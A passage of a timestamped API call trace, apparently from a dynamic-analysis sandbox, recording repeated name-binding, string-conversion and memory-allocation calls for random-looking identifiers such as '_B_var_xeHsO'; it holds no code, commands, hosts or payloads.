[0060.899] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_cnkZg", lHashVal=0x1040b4, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.899] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570782 | out: _Dst=0x343ddc) returned 0x0 [0060.899] CRetailMalloc_Free () returned 0x7940201 [0060.899] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55707a6, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="xeHsO") returned 6 [0060.899] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xeHsO", lHashVal=0x1070d2, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59a | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59a) returned 0x0 [0060.900] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.900] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55707a6 | out: _Dst=0x87fcc50) returned 0x0 [0060.900] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.900] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea121e, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_xeHsO") returned 13 [0060.900] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xeHsO", lHashVal=0x1034bf, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.901] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55707a6 | out: _Dst=0x343ddc) returned 0x0 [0060.901] CRetailMalloc_Free () returned 0x7940201 [0060.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55707ca, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="jSnOZNs") returned 8 [0060.902] ITypeComp:RemoteBind (in: This=0x87cef08, szName="jSnOZNs", lHashVal=0x1011eb, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59c | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59c) returned 0x0 [0060.902] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.902] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x55707ca | out: _Dst=0x87fcc50) returned 0x0 [0060.902] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.902] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea124a, cbMultiByte=15, lpWideCharStr=0x343d74, cchWideChar=16 | out: lpWideCharStr="_B_var_jSnOZNs") returned 15 [0060.903] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_jSnOZNs", lHashVal=0x10156f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.903] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x55707ca | out: _Dst=0x343ddc) returned 0x0 [0060.903] CRetailMalloc_Free () returned 0x7940201 [0060.903] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55707ee, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="Q79mwz") returned 7 [0060.903] ITypeComp:RemoteBind (in: This=0x87cef08, szName="Q79mwz", lHashVal=0x10242b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59e | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x59e) returned 0x0 [0060.904] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.904] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x55707ee | out: _Dst=0x87fcc50) returned 0x0 [0060.904] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.904] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1276, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_Q79mwz") returned 14 [0060.904] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_Q79mwz", lHashVal=0x109ed4, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.904] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x55707ee | out: _Dst=0x343ddc) returned 0x0 [0060.904] CRetailMalloc_Free () returned 0x7940201 [0060.905] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570812, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="xeHDUd") returned 7 [0060.905] ITypeComp:RemoteBind (in: This=0x87cef08, szName="xeHDUd", lHashVal=0x102286, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a0 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a0) returned 0x0 [0060.905] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.905] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570812 | out: _Dst=0x87fcc50) returned 0x0 [0060.906] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.906] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea12a2, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_xeHDUd") returned 14 [0060.906] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_xeHDUd", lHashVal=0x109d2f, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.906] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570812 | out: _Dst=0x343ddc) returned 0x0 [0060.906] CRetailMalloc_Free () returned 0x7940201 [0060.907] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570836, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="qsIvV") returned 6 [0060.907] ITypeComp:RemoteBind (in: This=0x87cef08, szName="qsIvV", lHashVal=0x1048a3, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a2 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a2) returned 0x0 [0060.907] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.907] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570836 | out: _Dst=0x87fcc50) returned 0x0 [0060.908] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.908] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea12ce, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_qsIvV") returned 13 [0060.908] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_qsIvV", lHashVal=0x100c90, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.908] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570836 | out: _Dst=0x343ddc) returned 0x0 [0060.908] CRetailMalloc_Free () returned 0x7940201 [0060.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557085a, cbMultiByte=7, lpWideCharStr=0x343d64, cchWideChar=8 | out: lpWideCharStr="hSBj5F") returned 7 [0060.909] ITypeComp:RemoteBind (in: This=0x87cef08, szName="hSBj5F", lHashVal=0x102ba8, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a4 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a4) returned 0x0 [0060.909] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.909] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557085a | out: _Dst=0x87fcc50) returned 0x0 [0060.909] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.909] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea12fa, cbMultiByte=14, lpWideCharStr=0x343d74, cchWideChar=15 | out: lpWideCharStr="_B_var_hSBj5F") returned 14 [0060.909] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_hSBj5F", lHashVal=0x10a651, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.910] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557085a | out: _Dst=0x343ddc) returned 0x0 [0060.910] CRetailMalloc_Free () returned 0x7940201 [0060.910] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x557087e, cbMultiByte=9, lpWideCharStr=0x343d64, cchWideChar=10 | out: lpWideCharStr="wewkvK5M") returned 9 [0060.910] ITypeComp:RemoteBind (in: This=0x87cef08, szName="wewkvK5M", lHashVal=0x105d8c, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a6 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a6) returned 0x0 [0060.910] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.910] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557087e | out: _Dst=0x87fcc50) returned 0x0 [0060.911] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.911] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1326, cbMultiByte=16, lpWideCharStr=0x343d74, cchWideChar=17 | out: lpWideCharStr="_B_var_wewkvK5M") returned 16 [0060.911] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_wewkvK5M", lHashVal=0x103515, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.911] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557087e | out: _Dst=0x343ddc) returned 0x0 [0060.911] CRetailMalloc_Free () returned 0x7940201 [0060.912] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55708a6, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="wnIHU") returned 6 [0060.912] ITypeComp:RemoteBind (in: This=0x87cef08, szName="wnIHU", lHashVal=0x1043cb, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a8 | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5a8) returned 0x0 [0060.912] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.912] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55708a6 | out: _Dst=0x87fcc50) returned 0x0 [0060.913] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.913] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea1352, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_wnIHU") returned 13 [0060.913] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_wnIHU", lHashVal=0x1007b8, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.913] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55708a6 | out: _Dst=0x343ddc) returned 0x0 [0060.913] CRetailMalloc_Free () returned 0x7940201 [0060.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55708ee, cbMultiByte=10, lpWideCharStr=0x343d64, cchWideChar=11 | out: lpWideCharStr="y531fa4D6") returned 10 [0060.914] ITypeComp:RemoteBind (in: This=0x87cef08, szName="y531fa4D6", lHashVal=0x103681, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5ac | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5ac) returned 0x0 [0060.914] CRetailMalloc_Alloc () returned 0x87504e0 [0060.914] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55708ee | out: _Dst=0x87504e0) returned 0x0 [0060.914] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.914] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea137e, cbMultiByte=17, lpWideCharStr=0x343d74, cchWideChar=18 | out: lpWideCharStr="_B_var_y531fa4D6") returned 17 [0060.915] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_y531fa4D6", lHashVal=0x103fc6, wFlags=0x3, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.915] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55708ee | out: _Dst=0x343ddc) returned 0x0 [0060.915] CRetailMalloc_Free () returned 0x1a060101 [0060.915] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55708ca, cbMultiByte=6, lpWideCharStr=0x343d64, cchWideChar=7 | out: lpWideCharStr="sBNUY") returned 6 [0060.915] ITypeComp:RemoteBind (in: This=0x87cef08, szName="sBNUY", lHashVal=0x10669b, wFlags=0x5, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5aa | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x4, pDummy=0x5aa) returned 0x0 [0060.915] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.916] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55708ca | out: _Dst=0x87fcc50) returned 0x0 [0060.916] IUnknown:Release (This=0x87ce888) returned 0x8 [0060.916] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x9ea13ae, cbMultiByte=13, lpWideCharStr=0x343d74, cchWideChar=14 | out: lpWideCharStr="_B_var_sBNUY") returned 13 [0060.917] ITypeComp:RemoteBind (in: This=0x87ce890, szName="_B_var_sBNUY", lHashVal=0x102a88, wFlags=0x5, ppTInfo=0x343d40, pDescKind=0x343d50, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0, pDummy=0x1 | out: ppTInfo=0x343d40*=0x0, pDescKind=0x343d50*=0, ppFuncDesc=0x343d44, ppVarDesc=0x884dc24, ppTypeComp=0x343ed0*=0x0, pDummy=0x1) returned 0x0 [0060.917] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55708ca | out: _Dst=0x343ddc) returned 0x0 [0060.917] CRetailMalloc_Free () returned 0x7940201 [0060.917] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x557093a | out: _Dst=0x87fcc50) returned 0x0 [0060.918] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x557093a | out: _Dst=0x343ddc) returned 0x0 [0060.918] CRetailMalloc_Free () returned 0x7940201 [0060.918] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570962 | out: _Dst=0x87504e0) returned 0x0 [0060.918] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570962 | out: _Dst=0x343ddc) returned 0x0 [0060.918] CRetailMalloc_Free () returned 0x1a060101 [0060.918] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x557098a | out: _Dst=0x87fcc50) returned 0x0 [0060.919] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x557098a | out: _Dst=0x343ddc) returned 0x0 [0060.919] CRetailMalloc_Free () returned 0x7940201 [0060.919] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x55709ae | out: _Dst=0x87fcc50) returned 0x0 [0060.919] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x55709ae | out: _Dst=0x343ddc) returned 0x0 [0060.919] CRetailMalloc_Free () returned 0x7940201 [0060.919] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55709fa | out: _Dst=0x87504e0) returned 0x0 [0060.919] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55709fa | out: _Dst=0x343ddc) returned 0x0 [0060.920] CRetailMalloc_Free () returned 0x1a060101 [0060.920] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x55709d2 | out: _Dst=0x87504e0) returned 0x0 [0060.920] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x55709d2 | out: _Dst=0x343ddc) returned 0x0 [0060.920] CRetailMalloc_Free () returned 0x1a060101 [0060.920] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570a22 | out: _Dst=0x87fcc50) returned 0x0 [0060.920] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570a22 | out: _Dst=0x343ddc) returned 0x0 [0060.920] CRetailMalloc_Free () returned 0x7940201 [0060.921] CRetailMalloc_Realloc () returned 0x6220eb8 [0060.921] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570a4a | out: _Dst=0x87504e0) returned 0x0 [0060.921] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570a4a | out: _Dst=0x343ddc) returned 0x0 [0060.921] CRetailMalloc_Free () returned 0x1a060101 [0060.921] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570a72 | out: _Dst=0x87fcc50) returned 0x0 [0060.922] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570a72 | out: _Dst=0x343ddc) returned 0x0 [0060.922] CRetailMalloc_Free () returned 0x7940201 [0060.922] CRetailMalloc_Alloc () returned 0x87fcc50 [0060.922] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570a9a | out: _Dst=0x87fcc50) returned 0x0 [0060.922] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570a9a | out: _Dst=0x343ddc) returned 0x0 [0060.922] CRetailMalloc_Free () returned 0x7940201 [0060.923] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570abe | out: _Dst=0x87fcc50) returned 0x0 [0060.923] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570abe | out: _Dst=0x343ddc) returned 0x0 [0060.923] CRetailMalloc_Free () returned 0x7940201 [0060.923] CRetailMalloc_Realloc () returned 0x7759f50 [0060.923] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570b06 | out: _Dst=0x87fcc50) returned 0x0 [0060.923] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570b06 | out: _Dst=0x343ddc) returned 0x0 [0060.923] CRetailMalloc_Free () returned 0x7940201 [0060.924] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570ae2 | out: _Dst=0x87fcc50) returned 0x0 [0060.924] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570ae2 | out: _Dst=0x343ddc) returned 0x0 [0060.924] CRetailMalloc_Free () returned 0x7940201 [0060.924] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570b2e | out: _Dst=0x87fcc50) returned 0x0 [0060.924] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570b2e | out: _Dst=0x343ddc) returned 0x0 [0060.924] CRetailMalloc_Free () returned 0x7940201 [0060.925] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x9, _Src=0x5570b76 | out: _Dst=0x87fcc50) returned 0x0 [0060.925] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x9, _Src=0x5570b76 | out: _Dst=0x343ddc) returned 0x0 [0060.925] CRetailMalloc_Free () returned 0x7940201 [0060.925] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570b52 | out: _Dst=0x87fcc50) returned 0x0 [0060.925] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570b52 | out: _Dst=0x343ddc) returned 0x0 [0060.925] CRetailMalloc_Free () returned 0x7940201 [0060.926] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570b9e | out: _Dst=0x87fcc50) returned 0x0 [0060.926] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570b9e | out: _Dst=0x343ddc) returned 0x0 [0060.926] CRetailMalloc_Free () returned 0x7940201 [0060.926] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x6, _Src=0x5570bc2 | out: _Dst=0x87fcc50) returned 0x0 [0060.926] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x6, _Src=0x5570bc2 | out: _Dst=0x343ddc) returned 0x0 [0060.926] CRetailMalloc_Free () returned 0x7940201 [0060.927] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570be6 | out: _Dst=0x87fcc50) returned 0x0 [0060.927] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x8, _Src=0x5570be6 | out: _Dst=0x343ddc) returned 0x0 [0060.927] CRetailMalloc_Free () returned 0x7940201 [0060.927] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x7, _Src=0x5570c0a | out: _Dst=0x87fcc50) returned 0x0 [0060.927] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0x7, _Src=0x5570c0a | out: _Dst=0x343ddc) returned 0x0 [0060.927] CRetailMalloc_Free () returned 0x7940201 [0060.928] _mbscpy_s (in: _Dst=0x87504e0, _DstSizeInBytes=0xa, _Src=0x5570c2e | out: _Dst=0x87504e0) returned 0x0 [0060.928] _mbscpy_s (in: _Dst=0x343ddc, _DstSizeInBytes=0xa, _Src=0x5570c2e | out: _Dst=0x343ddc) returned 0x0 [0060.928] CRetailMalloc_Free () returned 0x1a060101 [0060.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570c56, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="GpvZ2xn") returned 8 [0060.928] ITypeComp:RemoteBind (in: This=0x87ce890, szName="GpvZ2xn", lHashVal=0x104fcf, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x5da | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x0, pDummy=0x5da) returned 0x0 [0060.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570c56, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="GpvZ2xn") returned 8 [0060.928] ITypeComp:RemoteBind (in: This=0x87ce668, szName="GpvZ2xn", lHashVal=0x104fcf, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x5da | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x1, pDummy=0x5da) returned 0x0 [0060.928] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x5570c56, cbMultiByte=8, lpWideCharStr=0x343d64, cchWideChar=9 | out: lpWideCharStr="GpvZ2xn") returned 8 [0060.928] ITypeComp:RemoteBind (in: This=0x87ceab8, szName="GpvZ2xn", lHashVal=0x104fcf, wFlags=0x3, ppTInfo=0x343d30, pDescKind=0x343d40, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x5da | out: ppTInfo=0x343d30*=0x0, pDescKind=0x343d40*=0, ppFuncDesc=0x343d34, ppVarDesc=0x343ed0, ppTypeComp=0x2, pDummy=0x5da) returned 0x0 [0060.929] _mbscpy_s (in: _Dst=0x87fcc50, _DstSizeInBytes=0x8, _Src=0x5570c56 | out: _Dst=0x87fcc50) returned 0x0 [0060.929] _mbscpy_s 